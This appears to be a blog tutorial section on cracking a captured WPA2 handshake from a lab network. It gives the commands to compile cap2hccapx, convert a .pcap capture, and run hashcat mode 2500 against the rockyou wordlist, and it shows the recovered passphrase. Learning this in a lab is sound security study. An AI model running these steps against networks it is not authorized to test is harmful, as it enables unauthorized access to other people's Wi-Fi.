Cracking WPA2 Handshake

This section covers how to crack a WPA2 handshake captured with the previously showcased attack vector.


We need to convert the captured .pcap file into the .hccapx format before we can start cracking it. A tool named cap2hccapx does this, but we first need to download and compile it on our Unix system.

Compiling cap2hccapx

  • Downloading Source

  • Compiling Tool

gcc -o cap2hccapx cap2hccapx.c

  • Testing Tool



Now that we have the tool compiled and ready to go, we can convert the file and prep it for cracking!

cap2hccapx E4-6F-13-FA-AD-E0_partial.pcap capture.hccapx

Cracking with .hccapx

I'll be using Hashcat for the cracking on my host machine. Here's a post where I explain why cracking on the host machine is better 😊!

.\hashcat.exe -m 2500 .\hashes\capture.hccapx .\wordlists\rockyou.txt --force


tinkerbell is the PSK of the network in question

We were successfully able to crack the handshake and retrieve the password to the lab network!
